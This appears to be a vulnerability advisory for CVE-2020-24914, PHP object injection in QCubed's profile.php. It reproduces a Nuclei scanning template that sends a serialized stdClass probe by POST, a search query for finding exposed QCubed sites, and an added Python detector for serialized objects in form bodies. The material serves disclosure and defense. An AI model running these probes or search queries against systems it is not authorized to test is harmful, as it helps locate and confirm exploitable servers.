QCubed PHP Object Injection Vulnerability

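Vulnerability Information

Vulnerability name: QCubed PHP Object Injection Vulnerability

Vulnerability ID:

  • CVE: CVE-2020-24914

Vulnerability type: Deserialization

Severity: Critical

Description: QCubed is a PHP framework for rapid development of database-driven web applications. It is widely used in web development projects, particularly where rapid prototyping and development are needed. Typical deployments include enterprise services and common web application components.

This vulnerability is a deserialization flaw. Its root cause is that profile.php deserializes user-supplied POST data directly, without proper validation or filtering. An attacker can therefore craft a malicious POST request that injects a specific serialized object and thereby execute arbitrary code on the server.

The security risk is very high because the flaw lets an unauthenticated attacker execute code remotely, which can lead to full server compromise, data disclosure, or service disruption. Because the attack requires no authentication of any kind and can be automated, it poses a serious threat to sites running affected versions of the QCubed framework.

Vendor: QCubed

Product name: QCubed

Affected versions: 3.1.1 and all versions

Search syntax: title="QCubed" || body="qcubed"

Source: https://github.com/projectdiscovery/nuclei-templates/blob/02939a596df6ed5c7e8388c39de4f32d1d5ab2b8/http%2Fvulnerabilities%2Fphp%2Fqcubed-php-object-injection.yaml

Type: projectdiscovery/nuclei-templates:github issues

PoC details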


id: qcubed-php-object-injection

info:
  name: QCubed PHP Object Injection (CVE-2020-24914)
  author: pranjal
  severity: critical
  description: |
    QCubed 3.1.1 and all versions contain a PHP object injection caused by unserializing untrusted POST data in profile.php,
    letting unauthenticated attackers execute arbitrary code via crafted POST requests.
  reference:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24914
    - http://seclists.org/fulldisclosure/2021/Mar/28
    - https://tech.feedyourhead.at/content/QCubed-PHP-Object-Injection-CVE-2020-24914
    - https://www.ait.ac.at/themen/cyber-security/pentesting/security-advisories/ait-sa-20210215-01
  classification:
    cwe-id: CWE-502
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
  metadata:
    max-request: 2
    product: QCubed
    fofa-query: title="QCubed" || body="qcubed"
  tags: cve,cve2020,qcubed,php,object-injection,rce,kev

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36

    matchers:
      - type: dsl
        dsl:
          - 'status_code==200'
          - 'contains(tolower(body), "qcubed") || contains(tolower(body), "qform")'
        condition: and
        internal: true

  - raw:
      - |
        POST /profile.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36

        data=O:8:"stdClass":1:{s:4:"test";s:10:"{{randstr}}";}&action=save&id=1

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "stdClass"
          - "{{randstr}}"

      - type: status
        status:
          - 200

      - type: dsl
        dsl:
          - 'contains(body, "stdClass")'
          - 'contains(body, "{{randstr}}")'
        condition: and

    extractors:
      - type: regex
        part: body
        regex:
          - 'O:8:"stdClass":1:\{s:4:"test";s:\d+:"[^"]+";\}'
        internal: true
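
For defenders, the request shape used by the template above (a form field carrying a PHP serialized object) can be flagged in captured POST bodies. The following is an added example, not part of the template or of QCubed; the function names and the sample bodies are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# PHP serialize() object markers: O:<len>:"Class":<props>:{ and C:<len>:"Class":<bytes>:{
# Matched only at a token boundary (start of value, or after ';' or '{') so objects
# nested inside arrays are found too. '\+?' covers a signed length prefix.
OBJECT_TOKEN = re.compile(r'(?:^|(?<=[;{]))([OC]):\+?(\d+):"([^"]*)":\d+:\{')


def find_serialized_objects(value):
    """Return (marker, class_name, length_ok) for each object token in one field value."""
    hits = []
    for marker, declared, name in OBJECT_TOKEN.findall(value):
        # PHP only accepts the token when the declared length equals the name's byte length
        length_ok = int(declared) == len(name.encode("utf-8"))
        hits.append((marker, name, length_ok))
    return hits


def scan_form_body(body):
    """Scan an application/x-www-form-urlencoded body; return {param: [hits]}."""
    findings = {}
    # separator="&" keeps ';' inside the value, where PHP serialization uses it
    for key, value in parse_qsl(body, keep_blank_values=True, separator="&"):
        hits = find_serialized_objects(value)
        if hits:
            findings.setdefault(key, []).extend(hits)
    return findings


# Constructed sample bodies (not captured traffic)
SAMPLES = [
    # same shape as the template's POST, with a fixed string in place of {{randstr}}
    ("probe", 'data=O:8:"stdClass":1:{s:4:"test";s:10:"abcdefghij";}&action=save&id=1'),
    # percent-encoded, object nested inside an array
    ("encoded-nested", "data=a%3A1%3A%7Bi%3A0%3BO%3A8%3A%22stdClass%22%3A0%3A%7B%7D%7D&action=save"),
    # serialized array of scalars only: no object token, not flagged
    ("benign", "data=a%3A1%3A%7Bs%3A4%3A%22name%22%3Bs%3A3%3A%22bob%22%3B%7D&action=save&id=1"),
]

if __name__ == "__main__":
    for label, body in SAMPLES:
        print(label, scan_form_body(body))
```

A hit on any parameter sent to profile.php is worth reviewing regardless of class name, since the template's own probe uses the harmless built-in stdClass.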


http://example.com/2025/07/17/github_844445029/
Author: lianccc
Published: July 17, 2025